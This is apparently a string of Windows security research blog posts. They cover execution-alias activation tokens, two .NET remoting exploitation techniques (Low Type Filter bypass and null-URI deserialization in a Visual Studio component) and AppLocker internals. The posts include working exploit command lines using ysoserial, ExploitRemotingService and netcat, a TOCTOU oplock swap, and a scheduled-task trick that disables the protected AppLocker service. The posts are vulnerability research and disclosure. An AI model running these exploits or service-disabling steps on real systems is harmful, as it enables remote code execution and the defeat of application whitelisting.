The RAiGetPackageActivationToken RPC function takes a path to the execution alias and a template token (which is typically the current process token, or the explicit token if CreateProcessAsUser was called). The AppInfo service reads the reparse information from the execution alias and constructs an activation token based on that information. This token is then returned to the caller where it's used to construct the new process. It's worth noting that if the Application Type is non-zero this process doesn't actually create the AppContainer token and spawn the UWP application. This is because activation of a UWP application is considerably more complex to stuff into CreateProcess, so instead the execution alias' executable file is specified as the SystemUWPLauncher.exe file in system32 which completes activation based on the package information from the token.

What information does the activation token contain? It's basically the Security Attribute information for the package, this can't normally be modified from a user application, it requires TCB privilege. Therefore Microsoft do the token setup in a system service. An example token for the WinDbgX alias is shown below:

Token security attributes showing WinDbg package identity.

The rest of the activation process is not really that important. If you want to know more about the process checkout my talks on Desktop Bridge and the Windows Runtime.

I promised to finish up with a TOCTOU attack. In theory we should be able to create an execution alias for any installed application package; it might not start a working process but we can use RAiGetPackageActivationToken to get a new token with explicit package security attributes, which could be useful for further exploitation. For example we could try creating one for the Calculator package with the following PowerShell script (note this uses version information for Calculator on 1903 x64).

Set-ExecutionAlias -Path C:\winapps\calc.exe `
     -PackageName "Microsoft.WindowsCalculator_8wekyb3d8bbwe" `
     -EntryPoint "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App" `
     -Target "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.53.0_x64__8wekyb3d8bbwe\Calculator.exe" `
     -AppType UWP1

If we call RAiGetPackageActivationToken this works and creates a new token, however it creates a reduced privilege UWP token (it's not an AppContainer but for example all privileges are stripped and the security attributes assumes it'll be in a sandbox). What if we wanted to create a Desktop Bridge token which isn't restricted in this way? We could change the AppType to Desktop, however if you do this you'll find RAiGetPackageActivationToken fails with an access denied error. Digging a bit deeper we find it fails in daxexec!PrepareDesktopAppXActivation, specifically when it's checking if the package contains any Centennial (now Desktop Bridge) applications.

HRESULT PrepareDesktopAppXActivation(PACTIVATION_INFO activation_info) {
  if ((activation_info->Flags & 1) == 0) {
    CreatePackageInformation(activation_info, &package_info);
    if (FAILED(package_info->ContainsCentennialApplications())) {
      return E_ACCESS_DENIED; // <-- Fails here.
    }
  }
  // ...
}

This of course makes perfect sense, there's no point creating a desktop activation token for a package which doesn't have desktop applications. However, notice the if statement: if bit 1 is not set it does the check, but if it is set the check is skipped entirely. Where does that bit get set? We need to go back to the caller of PrepareDesktopAppXActivation, which is, unsurprisingly, RAiGetPackageActivationToken.

ACTIVATION_INFO activation_info = {};
bool trust_label_present = false;
HRESULT hr = IsTrustLabelPresentOnReparsePoint(path, &trust_label_present);
if (SUCCEEDED(hr) && trust_label_present) {
  activation_info.Flags |= 1;
}
PrepareDesktopAppXActivation(&activation_info);

This code shows that the flag is set based on the result of IsTrustLabelPresentOnReparsePoint. While we could infer what that function is doing let's reverse that as well:

HRESULT IsTrustLabelPresentOnReparsePoint(LPWSTR path, bool *trust_label_present) {
  HANDLE file = CreateFile(path, READ_CONTROL, ...);
  if (file == INVALID_HANDLE_VALUE)
    return E_FAIL;
  PSID trust_sid;
  GetWindowsPplTrustLabelSid(&trust_sid);
  PSID sacl_trust_sid;
  GetSecurityInfo(file, SE_FILE_OBJECT, PROCESS_TRUST_LABEL_SECURITY_INFORMATION, &sacl_trust_sid);
  *trust_label_present = EqualSid(trust_sid, sacl_trust_sid);
  return S_OK;
}

Basically what this code is doing is querying the file object for its Process Trust Label. The label can only be set by a Protected Process, which normally we're not. There are ways of injecting into such processes but without that we can't set the trust label. Without the trust label the service will do the additional checks which stop us creating an arbitrary desktop activation token for the Calculator package.
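As an aside, you can look for a trust label on a file yourself. Here's a rough NtObjectManager sketch (I'm assuming the security descriptor object exposes the label via a ProcessTrustLabel property; most ordinary files, unlike the WindowsApps package files, won't have one):

# Open the file for READ_CONTROL and query just the process trust label part
# of its security descriptor.
Use-NtObject($f = Get-NtFile -Win32Path "C:\Windows\System32\notepad.exe" -Access ReadControl) {
    $f.GetSecurityDescriptor("ProcessTrustLabel").ProcessTrustLabel
}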

However notice how the check re-opens the file. This occurs after the reparse point, which contains all the package details, has been read. It should be clear that there is a TOCTOU here: if you can get the service to first read an execution alias with the package information, then switch that file for another which has a valid trust label, we can disable the additional checks. This was an attack that my BaitAndSwitch tool was made for. If you build a copy then run the following command you can then use RAiGetPackageActivationToken with the path c:\x\x.exe and it'll bypass the checks:

BaitAndSwitch c:\x\x.exe c:\path\to\no_label_alias.exe c:\path\to\valid_label_alias.exe x

Note that the final 'x' is not a typo, this ensures the oplock is opened in exclusive mode which ensures it'll trigger when the file is initially opened to read the package information. Is there much you can really do with this? Probably not, but I thought it was interesting none the less. It'd be more interesting if this had disabled other, more important checks but it seems to only allow you to create a desktop activation token.

That about wraps it up for now. Embedding this functionality inside CreateProcess was clever, certainly over the crappy support for UAC which requires calling ShellExecute. However it also adds new and complex functionality to CreateProcess which didn't exist before, I'm sure there's probably some exploitable security bug in the code here, but I'm too lazy to find it :-)

Bypassing Low Type Filter in .NET Remoting

I recently added a new feature to my .NET remoting exploitation tool which in many cases allows you to exploit an arbitrary service through serialization. This feature has always existed in the tool, if you passed the useser option, however it only worked if the service had enabled Full Type Filter mode. The default for remoting services is Low Type Filter, which my tool couldn't easily exploit. I'm going to explain how I bypassed Low Type Filter mode in the latest tool.

It's worth noting that this technique is currently unpatched, however no one should be using .NET remoting in a modern context (*cough* Visual Studio *cough*).

I'd recommend starting by reading my previous blog post on this subject as it describes where the Type Filtering comes into play. You can also read this MSDN page which describes what can and cannot be deserialized during a .NET remoting call with Low versus Full Type Filtering enabled.

In simple terms enabling Low (which is the default) over Full results in the following restrictions:
  • Object types derived from MarshalByRefObject, DelegateSerializationHolder, ObjRef, IEnvoyInfo and ISponsor can not be deserialized. 
  • All objects which are deserialized must not Demand any CAS permission other than SerializationFormatter permission.
The useser technique abuses the fact that certain classes such as DirectoryInfo and FileInfo are both derived from MarshalByRefObject (MBR) and are also serializable. By deserializing an instance of one of the special classes inside a carefully crafted Hashtable with an MBR instance of IEqualityComparer, you can get the server to pass back the instance. As this object is passed back over the remoting channel the DirectoryInfo or FileInfo objects are marshalled by reference and are stuck inside the server. We can now call methods on the returned object to read and write arbitrary files, which we can use to get full code execution in the server. I've summarized the main interactions in the following diagram:
1, Create DirectoryInfo, 2, Serialize DirectoryInfo, 3, Handle Remoting, 4, Deserialize DirectoryInfo, 5, Marshal By Reference, 6, Capture DirectoryInfo, 7, Create AdminFile.txt, 8, AdminFile.txt created.
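You can quickly confirm the unusual combination that makes these classes special from a PowerShell prompt (plain .NET reflection, nothing specific to the tool):

# DirectoryInfo (and FileInfo) are serializable *and* derive from MarshalByRefObject,
# which is what lets them cross the remoting boundary in both directions.
$t = [System.IO.DirectoryInfo]
$t.IsSerializable                                  # True
[System.MarshalByRefObject].IsAssignableFrom($t)   # True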

Low Type Filter acts to modify the behavior of the BinaryServerFormatterSink block, which encapsulates blocks 3, 4 and 5. The change in behavior blocks the useser technique in three ways.

Firstly in order to get the instance of the special object passed back to the client we need to pass an MBR IEqualityComparer. This will be blocked during handling of the remoting message (3).

Secondly when deserializing an instance of FileInfo or DirectoryInfo (4) a Demand is made for a FileIOPermission for the path to access. As the permission Demand is made during deserialization it hits the restriction that only SerializationFormatter permissions are allowed.

Thirdly, even if the object is deserialized successfully we'll hit a final problem: calling the IEqualityComparer (5 and 6) over a remoting channel to pass back the reference requires setting up a new TCP or Named Pipe connection. Setting up the connection will also hit the limited permissions and again throw an exception, causing the call to fail.

How can we work around the three issues? Let's first bypass the type checking which prevents MBR objects being deserialized. If you dig into the code you'll find the type checks are performed in the ObjectReader::CheckSecurity method, which is as follows:

internal void CheckSecurity(ParseRecord pr) {
    Type t = pr.PRdtType;
    if ((object)t != null) {
        if (IsRemoting) {
            if (typeof(MarshalByRefObject).IsAssignableFrom(t))
                throw new ArgumentException();
            FormatterServices.CheckTypeSecurity(t, formatterEnums.FEsecurityLevel);
        }
    }
}

The important thing to note is that the checks are only made if the IsRemoting property is true. What determines the value of the property? Again we can just look in the reference source:

private bool IsRemoting {
    get {
        return (bMethodCall || bMethodReturn);
    }
}

What sets bMethodCall or bMethodReturn? They're set by the BinaryFormatter when it encounters the special MethodCall or MethodReturn record types. It turns out that, maybe for performance or security (unclear), the formatter special cases these object types when used in .NET remoting, only storing the properties of these objects when serializing and reconstructing the method objects when deserializing.

However if you read my previous blog post you'll notice something, I was unmarshalling a MBR instance of an IMessage, and that didn't hit the checks. This was because as long as the top level record is not a MethodCall or MethodReturn record type then we can deserialize anything we like, that was easy to bypass. In theory we can just pass a serialized Hashtable as the top level object, it'll cause the remoting server code to fault when trying to call methods on the message object but by then it'd be too late. In fact this is exactly what the useser option does anyway, however it's the second security feature which really causes us problems trying to get it to work on Low Type Filter.

When handling an incoming request it enables a PermitOnly CAS grant over the deserialization process, which only allows SerializationFormatter permissions to be asserted. You can see it in action in the reference source here, which I've copied below.

PermissionSet currentPermissionSet = null;
if (this.TypeFilterLevel != TypeFilterLevel.Full) {
    currentPermissionSet = new PermissionSet(PermissionState.None);
    currentPermissionSet.SetPermission(
        new SecurityPermission(
            SecurityPermissionFlag.SerializationFormatter));
}

try {
    if (currentPermissionSet != null)
        currentPermissionSet.PermitOnly();

    // Deserialize Request - Stream to IMessage
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(
        objectUri, requestStream, _strictBinding, this.TypeFilterLevel);
}
finally {
    if (currentPermissionSet != null)
        CodeAccessPermission.RevertPermitOnly();
}


As we're passing the Hashtable containing the serialized object we want to capture as well as the MBR IEqualityComparer as the top level object all of our machinations will run during this PermitOnly grant, which as I've already noted will fail. If we could defer the deserialization, or at least any privileged operation until after the CAS grant is reverted we'd be able to exploit this trick, but how can we do that?

One way to defer code execution is to exploit object finalization. Basically when an object's resources are about to be reclaimed by the GC it'll call the object's finalizer. This call is made on a GC thread completely outside the deserialization process and so wouldn't be affected by the CAS PermitOnly grant. In fact abusing finalizers was something I pointed out in my original research on .NET serialization, a good example is the infamous TempFileCollection class.
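For example, a couple of lines of reflection show why TempFileCollection keeps turning up in serialization attacks:

# Serializable, and declares a finalizer which deletes the files in the collection,
# giving deferred code execution on a GC thread.
$t = [System.CodeDom.Compiler.TempFileCollection]
$t.IsSerializable
$null -ne $t.GetMethod('Finalize', [System.Reflection.BindingFlags]'NonPublic,Instance')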

I thought about trying to find a useful gadget to exploit this, however there were two problems. First the difficulty in finding a suitable object which is both serializable and has a useful finalizer defined and second, the call to the finalizer is non-deterministic as it's whenever the GC gets called. In theory the GC might never be called.

I decided to focus on a different approach based on a non-obvious observation. The PermitOnly security behaviors of Low Type Filter only apply when calling a method on a server object, not deserializing the return value. Therefore if I could find somewhere in the server which calls back to a MBR object I control then I can force the server to deserialize an arbitrary object. This object can be used to mount the attack as the deserialization would not occur under the PermitOnly CAS grant and I can use the same Hashtable trick to capture a DirectoryInfo or FileInfo object.

In theory you could find an exposed method on the server object to use for this callback, however I wanted my code to be generic and not require knowledge of the server object outside of the knowing the URI. Therefore it'd have to be a method we can call on the MBR or base Object class. An initial look only shows one candidate, the Object::Equals method which takes a single parameter. Unfortunately most of the time a server object won't override this method and the default just performs reference equality which doesn't call any methods on the passed object.

The only other candidates are the InitializeLifetimeService or GetLifetimeService methods which return an MBR which implements the ILease interface. I'm not going to go into what this is used for (you can read up on it on MSDN) but what I noticed was the ILease interface has a Register method which takes an object which implements the ISponsor interface. If you register an MBR object in the client with the server's lifetime service then when the server wants to check if the object should be destroyed it'll call the ISponsor::Renewal method, which gives us our callback. While the method doesn't return an object, we can just throw an exception with the Hashtable inside and exploit the service. Victory?

Not quite, it turns out that we've now got new problems. The first one is the Renewal call only happens when the lifetime counter expires, the default timeout is around 10 minutes from the last call to the server. This means that our exploit will only run at some long, potentially indeterminate point in time. Not the end of the world, but as frustrating as waiting for a GC run to get a finalizer executed. But the second problem seems more insurmountable, in order to set the ISponsor object we need to make an actual call to the server, however Low Type Filter would stop us from passing an MBR ISponsor object as the top level object would be a MethodCall record type which would throw an exception when it was encountered during argument deserialization.

What can we do? It turns out there's an easy way around this: the framework provides us with a fully serializable MethodCall class. Instead of using the MethodCall record type we can package up a serializable MethodCall object as the top level object with all the data needed to make the call to Register. As the top level object uses a normal serialized object record type and not a MethodCall record type it'll never trigger the type checking and we can call Register with our MBR ISponsor object.

You might wonder if there's another problem here, won't deserializing the MBR cause the channel to be created and hit the PermitOnly CAS grant? Fortunately channel setup is deferred until a call is made on the object, therefore as long as no call is made to the MBR object during the deserialization process we'll be out of the CAS grant and able to setup the channel when the Renewal method is called.

We now have a way of exploiting the remoting service without knowledge of any specific methods on the server object, the only problem is we might need to wait 10 minutes to do it. Can we improve on the time? Digging further into the default remoting implementation I noticed that if an argument being passed to a method isn't directly of the required type the method StackBuilderSink::SyncProcessMessage will call Message::CoerceArgs to try to coerce the argument to the correct type. The fallback is to call Convert::ChangeType passing the needed type and the object passed from the client. To convert to the correct type the code will see if the passed object implements the IConvertible interface and call the ToType method on it. Therefore, instead of passing an implementation of ISponsor to Register we just pass one which implements IConvertible; the remoting code will try and coerce it using ChangeType, which will give us our needed callback immediately without waiting 10 minutes. I've summarized the attack in the following diagram:

1, Call ILease::Register, 2, Handle Message, 3 Coerce Arguments, 4, Create DirectoryInfo, 5, Deserialize DirectoryInfo, 6, Marshal DirectoryInfo, 7, Capture DirectoryInfo, 8 Create AdminFile.
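The coercion fallback itself is easy to see in isolation. Convert::ChangeType defers to the IConvertible implementation of whatever value it's handed; with a caller-controlled IConvertible and a non-primitive target type (like ISponsor) that means a call to our ToType method:

# Here the string's own IConvertible implementation performs the conversion; in
# the attack our malicious IConvertible's ToType method is what gets called.
[Convert]::ChangeType("1234", [int])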

This entire exploit is implemented behind the uselease option. It works in the same way as useser but should work even if the server is running Low Type Filter mode. Of course there are caveats: this only works if the server sets up a bi-directional channel, if it registers a TcpChannel or IpcChannel then that should be fine, but if it just sets up a TcpServerChannel it might not work. Also you still need to know the URI of the server and bypass any authentication requirements.

If you want to try it out grab the code from github and compile it. First run the ExampleRemotingServer with the following command line:

ExampleRemotingService.exe -t low

This will run the example service with Low Type Filter. Now you can try useser with the following command line:

ExploitRemotingService.exe --useser tcp://127.0.0.1:12345/RemotingServer ls c:\

You should notice it fails. Now change useser to uselease and rerun the command:

ExploitRemotingService.exe --uselease tcp://127.0.0.1:12345/RemotingServer ls c:\

You should see a directory listing of the C: drive. Finally if you pass the autodir option the exploit tool will try and upload an assembly to the server's base directory and bootstrap a full server from which you can call other commands such as exec.

ExploitRemotingService.exe --uselease --autodir tcp://127.0.0.1:12345/RemotingServer exec notepad

If it all works you should find the example server will spawn notepad. This works on a fully up to date version of .NET (e.g. .NET 4.8).

The take away from this is DO NOT EVER USE .NET REMOTING IN PRODUCTION. Even if you're lucky and you're not exploitable for some reason, the technology should be considered completely deprecated and (presumably) will never be ported to .NET Core.

The Ethereal Beauty of a Missing Header

Skip to the end if you don't want to listen to me regaling you with a mostly made up story :-)

It was a dark and stormy night, as clichés go you might as well go with a classic. With little else to occupy my time I booted my PC and awoke my trusted companion Wireshark (née Ethereal) and looked at what communications were being lost to time due to the impermanence of localhost. Hey, don't judge me, I wrote a book on it remember?

Observing the pastel shaded runes flashing before my eyes I divined a new understanding of that which remains hidden from a mortal's gaze. As if a metaphor for our existence I observed the BITS service shouting into the void, desperately trying to ask a question of the WinRM service that would never be answered. In an instant something else caught my eye, unrelated to the intelligence or lack thereof of data transfers. As the hex flickered across my screen I realized in horror what it was; its grim visage staring at me like some horrible ghost of the past. What I saw both repulsed and excited me, here was something I could reason about:

Screenshot from wireshark showing .NET remoting network traffic which has a .NET magic at the start.

Those three little characters, .NET, reverberated in my mind, almost as if the computer was repeating a forbidden soliloquy on the assumption it wouldn't be overheard. Here in the year 2019, I shouldn't expect to read such a subversive codex as this. What malfeasance had my Operating System undertaken to spout such vulgar prose? It was a horrible night to find the .NET Remoting protocol.

It's said [citation needed], "Eternal damnation is reserved for evil people and developers who use insecure deprecated technologies," if such a distinction could be made between the two. Whoever was not paying attention to MSDN was clearly up to no good. I made the decision to track down the source of this abomination and bring them to justice. As with all high crimes, evidence of misdeeds is meaningless without suspects; assuming the perpetrator was still around I did what all good detectives do, used my position of authority (an Admin Command Prompt) and interrogated every shifty character who was hanging around the local neighborhood. Or at least I looked up the listening TCP ports using netstat with the -b switch to print the guilty party. Two suspects came immediately to light:

C:\> netstat -p TCP -nqb
....
TCP    127.0.0.1:51889        0.0.0.0:0              LISTENING
[devenv.exe]
TCP    127.0.0.1:51890        0.0.0.0:0              LISTENING
[Microsoft.Alm.Shared.Remoting.RemoteContainer.dll]

Caught red-handed, I moved in to apprehend them. Unfortunately, devenv (records indicate this is an alias for Mr Visual Studio 2017 Esq., a cad of some notoriety) was too unwieldy to subdue. However his partner in crime was not so blessed and easily fell within my clutches. Dragging him back to the (work)station I subjected the rogue, whom I nicknamed Al due to his long, unpronounceable name, to a thorough interrogation. He easily confessed his secrets, with the application of a bit of decompilation, part of which I've reproduced below for the edification of the reader:

public static IRemotingChannel RegisterRemotingChannel(
                               string portName) {
    var sinkProvider = new BinaryServerFormatterSinkProvider
    {
        TypeFilterLevel = TypeFilterLevel.Full
    };
    var properties = new Dictionary<string, object> {
        { "name", portName },
        { "port", 0 },
        { "rejectRemoteRequests", true }
    };
    var channel = new TcpServerChannel(properties, sinkProvider);
    return new RemotingChannel(channel, 
            () => channel.GetChannelUri());
}

Of course, the use of .NET Remoting had Al bang to rights, but even if a judge decided that wasn't a sufficient crime I could also charge him with using a TCP channel with no authentication and enabling Full Type Filter mode. I asked Al to explain himself, so speaking in a cod 18th Century Cockney accent (even though his identification was clearly of a man from the west coast of the United States of America) he tried to do so:

Moi: Didn't you know what you were doing was a crime against local security?
Al: Sure Guv'na, but devy told me that his bleedin' plan couldn't be exploited?
M: In what way did your mate 'devy' claim such a thing was possible?
A: Well for one, we'd not set a pre-agreed port to talk to us on. [Presumably referring to the use of port '0' which automatically allocates a random port].
M: But I found your port, it wasn't hard to do as I could hear you talking between yourselves. Surely he had a better plan than that?
A: Well, we don't trust the scum from outside the neighborhood, we only trusted people locally. [This was the meaning of rejectRemoteRequests which ensures it only binds the port to localhost].
M: I'm surprised you trust everyone locally? What about other ne'er-do-wells logged on to the same machine but in different sessions?
A: See coppa' we thought of that, in order to talk to me or devy you'd need to know our secret code word, without that you ain't gettin' nowt. [the portName presumably].

This final answer stumped me, sure they weren't authenticating each other but at least if the code word was unguessable it'd be hard to exploit them. Further investigation indicated their secret code word was a randomly generated Globally Unique Identifier which would be almost impossible to forge. Maybe I'd have to let Al free after all?

But something gnawed at me, neither Al nor Devy were very bright, there must be more to this story. After further pressing, Al confessed that he never remembered the code word, and instead had a friend, BinaryServerFormatterSink (Binny to those in a similar trade), verify it for them using the following check:

string objectUri = wkRequestHeaders.RequestUri;

if (objectUri != lastUri 
    && RemotingServices.GetServerTypeForUri(objectUri) == null)
    throw new RemotingException();

lastUri = objectUri;

I realized that I'd got him. Binny was lazy, he remembered the last code word (lastUri) he'd been given and stored it away for safekeeping. If no one had ever talked to Al before then Binny didn't yet know the code word. You couldn't give him a random one, but if you didn't give him a code word at all then lastUri would equal objectUri because both would be null. This whole scheme had come crashing down on their heads.

I reported Binny to the authorities (via a certain Chief Constable Dorrans) but they seemed to be little interested in making the perpetrator change their ways. I made a note in my log book (ExploitRemotingServices) and continued on my way, satisfied in a job well done, sort of.

The Less Wankery, Useful, Technical Bit

TL;DR; for some reason Visual Studio 2017 (and possibly 2019) has code which specifically uses .NET remoting in a fairly insecure way. It doesn't do authentication, it uses TCP for no obvious reason and it sets the type filter mode to Full which means it'd be trivially vulnerable to serialization attacks (see blog posts passim). However, on a positive note it does bind to localhost only, which will ensure it's not remotely exploitable and it chooses to generate a random service name, from a GUID, which makes it almost impossible to guess or brute force.

Therefore, it's basically unexploitable outside a difficult to win race condition and only if the attacker is on the same machine as the user running Visual Studio. I don't like those odds, so I never seriously considered reporting it to MSRC.

Why am I even blogging about it? It's all to do with the fact that you can not specify the URI, and as long as no one has previously connected to the service successfully then you can reach the call to BinaryFormatter::Deserialize and potentially get arbitrary code execution. This might be especially interesting if you're running a pentesting engagement and you find an exposed .NET remoting service but do not have a copy of the client or server with which to extract the appropriate URI to make a call.

How would you know if you do find such a service? If you send garbage to a .NET remoting service (at least one not in secure mode) it will respond with the previously mentioned magic ".NET" signature data, as shown in the following screenshot from Wireshark:

Screen shot of Wireshark following connection. The string Boo! is sent to the server which responds with .NET remoting protocol.

When combined with the fact that the .NET remoting protocol doesn't require any negotiation (again assuming no secure mode) we can create a simple payload which would exploit any .NET remoting server assuming we have a suitable serialization payload, the server is running in Full type filter mode and nothing has previously connected to the service.

Let's put that payload together. You'll need the latest ExploitRemotingService from GitHub and also a copy of ysoserial.net to generate a serialization payload. First run the following ysoserial command to generate a simple TypeConfuseDelegate which will start notepad when deserialized and write the raw data to the file run_notepad.bin:

ysoserial.exe -f BinaryFormatter -o raw -g TypeConfuseDelegate -c notepad > run_notepad.bin

Now run ExploitRemotingService, ensuring you pass both the --nulluri option and the --path option to output the request to a file, and use the raw command with the run_notepad.bin file:

ExploitRemotingService.exe --nulluri --path request.bin tcp://127.0.0.1:1234/RemotingServer raw run_notepad.bin

You'll now have a file which looks like the following:

Hex dump of request.bin.

Normally before the serialized data there should be the URI for the remoting service (as shown in the first screenshot of this blog post), which is not present in this file. We can now test this out, run the ExampleRemotingService with the following command line, binding to port 1234 and running with Full type filter mode:

ExampleRemotingService.exe -p 1234 -t full

Using your favorite testing tool, such as netcat, just dump the file to TCP port 1234:

nc 127.0.0.1 1234 < request.bin
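If netcat isn't to hand, a few lines of PowerShell will do the same job. This is just my stand-in for nc, not part of the tooling; it opens a TCP connection and writes the raw request bytes:

# Fire the raw serialized request at the remoting service and give it a moment to process.
$client = New-Object System.Net.Sockets.TcpClient("127.0.0.1", 1234)
$stream = $client.GetStream()
$data = [System.IO.File]::ReadAllBytes("$PWD\request.bin")
$stream.Write($data, 0, $data.Length)
$stream.Flush()
Start-Sleep -Seconds 1
$client.Close()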

If everything is correct, you'll find notepad starts. If it doesn't work ensure you've built ExampleRemotingService as a .NET 4 binary otherwise the serialization payload won't execute.

What if the service has been connected to before and so the last URI has been set? One trick would be to find a way of causing the server to crash *cough* but that's out of the scope of this blog post. If anyone fancies adding a new plugin to ysoserial to generate the raw payload rather than needing two tools, then be my guest.

I think it's worth stressing, once again, that you really should not be using .NET remoting on anything you care about. I'd be interested to find out if anyone manages to use this technique on a real engagement.

The Internals of AppLocker - Part 1 - Overview and Setup

This is part 1 in a short series on the internals of AppLocker (AL). Part 2 is here, part 3 here and part 4 here.

AppLocker (AL) is a feature added to Windows 7 Enterprise and above as a more comprehensive application white-listing solution over the older Software Restriction Policies (SRP). When configured it's capable of blocking the creation of processes using various different rules, such as the application path as well as optionally blocking DLLs, script code, MSI installers etc. Technology wise it's slowly being replaced by the more robust Windows Defender Application Control (WDAC) which was born out of User Mode Code Integrity (UMCI), however at the moment AL is still easier to configure in an enterprise environment. It's considered a "Defense in Depth" feature according to MSRC's security servicing criteria so unless you find a bug which gives you EoP or RCE it's not something Microsoft will fix with a security bulletin.

It's common to find documentation on configuring AL, and even on bypassing it (see for example Oddvar Moe's case study series on his website), however the inner workings are usually harder to find. Some examples of documentation which go some way towards documenting AL internals that I could find are:
However even these articles don't really give the full details. Therefore, I thought I'd dig a little deeper into some of the inner workings of AL, specifically focusing on the relationship between user access tokens and the applied rules. I'm not going to talk about configuration (outside of a quick setup for demonstration purposes) and I'm not really going to talk about bypasses. However, I will also pass on some dumb tricks you can do with an AL configured system which might be "bypass-like". Also note that this is documenting the behavior on Windows 10 1909 Enterprise. The internals might be, and almost certainly are, different on other versions of Windows.

Let's start with a basic overview of the various components and give a super quick setup guide for a basic AL enabled Windows 10 1909 Enterprise installation so that we can try things out in subsequent parts.

Component Overview

AL uses a combination of a kernel driver (APPID.SYS) and user mode service (APPIDSVC). The introduction of kernel code is what distinguishes it from the old SRP which was entirely enforced in user mode, and so wasn't too difficult to bypass. The kernel driver's primary role is to handle blocking process creation through a Process Notification Callback as well as provide some general services. The user mode service on the other hand is more of a helper to do things which are difficult or impractical in the kernel, such as comprehensive code signature verification. That said looking at the implementation I think the majority could be done entirely in kernel mode considering that's what the Code Integrity (CI) module already does.

For DLL, Script and MSI enforcement various user-mode components access the SAFER APIs to determine whether code should run. The SAFER APIs might then call into the kernel driver or into the service over RPC depending on what it needs to do. I've summarized the various links in the following diagram.

The various interactions between components in AppLocker.

Setting up a Test System

I started by installing Windows 10 1909 Enterprise from an MSDN ISO. If you don't have MSDN access you can get a trial Dev Environment VM from Microsoft which runs Windows 10 Enterprise. At the time of writing it's only 1903, but that's probably good enough, you should even be able to update to 1909 if you so desire. Then follow the next steps:
  1. Startup the VM and login as an administrator, then run an admin PowerShell console.
  2. Download the Default AppLocker Policy file from GitHub and save it as policy.xml.
  3. Run the PowerShell command "Set-AppLockerPolicy -XmlPolicy policy.xml".
  4. Run the command "sc.exe config appidsvc start= auto".
  5. Reboot the VM. 
This will install a simple default policy then enable the Application Identity Service. The policy is as follows:
  • EXE Rules
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
  • DLL Rules
    • Allow Everyone group access to load any DLL under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to load a DLL from anywhere.
  • APPX Rules (Packages Applications, think store applications)
    • Allow Everyone to load any signed, packaged application .
Of course these rules are terrible and no one should actually use them, I've just presented them for the purposes of this blog post series.

Where is the policy configuration stored? There's some data in the registry, but the core of the policy configuration is stored in the directory %WINDIR%\SYSTEM32\APPLOCKER, separated by type. For example the executable configuration is in EXE.APPLOCKER, the other names should be self explanatory. When the files in this directory are modified a call is made to the driver to reload the policy configuration. If we take a look at one of these files in a hex editor you'll find they're nothing like the XML policy we put in (as shown below), we'll come back to what these files actually contain in part 3 of this blog series.

Hex dump of the Exe.Applocker file which shows only binary data, no XML.
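If you want to poke at those files yourself the built-in cmdlets are enough, no special tooling required:

# List the per-type policy files and dump the executable policy as hex.
Get-ChildItem "$env:WINDIR\System32\AppLocker"
Format-Hex -Path "$env:WINDIR\System32\AppLocker\Exe.Applocker"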

Once you reboot the VM the service will be running and AL will now be enforced. If you login as the administrator again, copy an executable to their Desktop folder (a location not allowed by policy) and run it, you'll find it works... You might think this makes sense generally, the user is an administrator which should be allowed to execute everything from anywhere, however the default administrator is a UAC split-token admin, so the default "user" wouldn't have the Administrators group and so shouldn't be allowed to run code from anywhere. We'll get back to why this works in part 3.

To check AL is working, create a new user (say using the New-LocalUser PowerShell command, as sketched below) and do not assign them to the local administrators group. Login as the new user and try copying and running the executable on the desktop again. You should be greeted with a suitable error dialog.
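The account details here are purely illustrative, any standard user will do:

# Create a standard test user and add them to Users so they can log on interactively.
$password = ConvertTo-SecureString 'Passw0rd!AL' -AsPlainText -Force
New-LocalUser -Name 'altest' -Password $password | Out-Null
Add-LocalGroupMember -Group 'Users' -Member 'altest'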

AppLocker error showing executable has been blocked from running.

It should be noted that even if you just enable the APPID driver AL won't be enforced, the service needs to be running for everything to be correctly enabled. You might assume you can just disable the service as an administrator and turn off AL trivially? Well about that...

C:\> sc.exe config appidsvc start= demand
[SC] ChangeServiceConfig FAILED 5:

Access is denied.

Seems you can't reconfigure the service back to demand start (its initial start mode) once you've auto started it. The answer to why you're given access denied is simple:

C:\> sc.exe qprotection appidsvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE appidsvc PROTECTION LEVEL: WINDOWS LIGHT.

On Windows 10 (I've not checked 8.1) the AppID service runs as PPL. This means the Service Control Manager (SCM) prevents "normal" administrators from tampering with the service, such as disabling it or stopping it. I really don't see why Microsoft did this, there's SO many different ways to compromise AppLocker's function as an administrator it's not funny, disabling the service should presumably be the least of your worries. Oh well, of course in this case if you really must disable the service at run time you can use the Task Scheduler trick I showed in September to run some commands as TrustedInstaller, which happens to be a backdoor into the SCM. Try running the following PowerShell script as an administrator:
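Something along the following lines should do the trick. It's only a sketch using the built-in ScheduledTasks cmdlets (the task name is arbitrary); the idea is just to get sc.exe running with the TrustedInstaller service identity, which the SCM will happily obey:

# Register a one-shot task running as TrustedInstaller and use it to reconfigure the PPL service.
$action = New-ScheduledTaskAction -Execute "sc.exe" -Argument "config appidsvc start= demand"
$principal = New-ScheduledTaskPrincipal -UserId "NT SERVICE\TrustedInstaller" -LogonType ServiceAccount
Register-ScheduledTask -TaskName "TIDemo" -Action $action -Principal $principal | Out-Null
Start-ScheduledTask -TaskName "TIDemo"
Start-Sleep -Seconds 2
Unregister-ScheduledTask -TaskName "TIDemo" -Confirm:$false
# The same approach works for "sc.exe stop appidsvc" if you also want to stop the running instance.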

That's all for now, in part 2 we'll dig into how the Executable enforcement works under the hood.


The Internals of AppLocker - Part 2 - Blocking Process Creation

This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to set up a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate, in case you've forgotten, that what I'm describing are the internals on Windows 10 1909; the details can be, and almost certainly are, different on other operating systems.

How Can You Block Process Creation?

When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can block process creation by assigning an error code to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

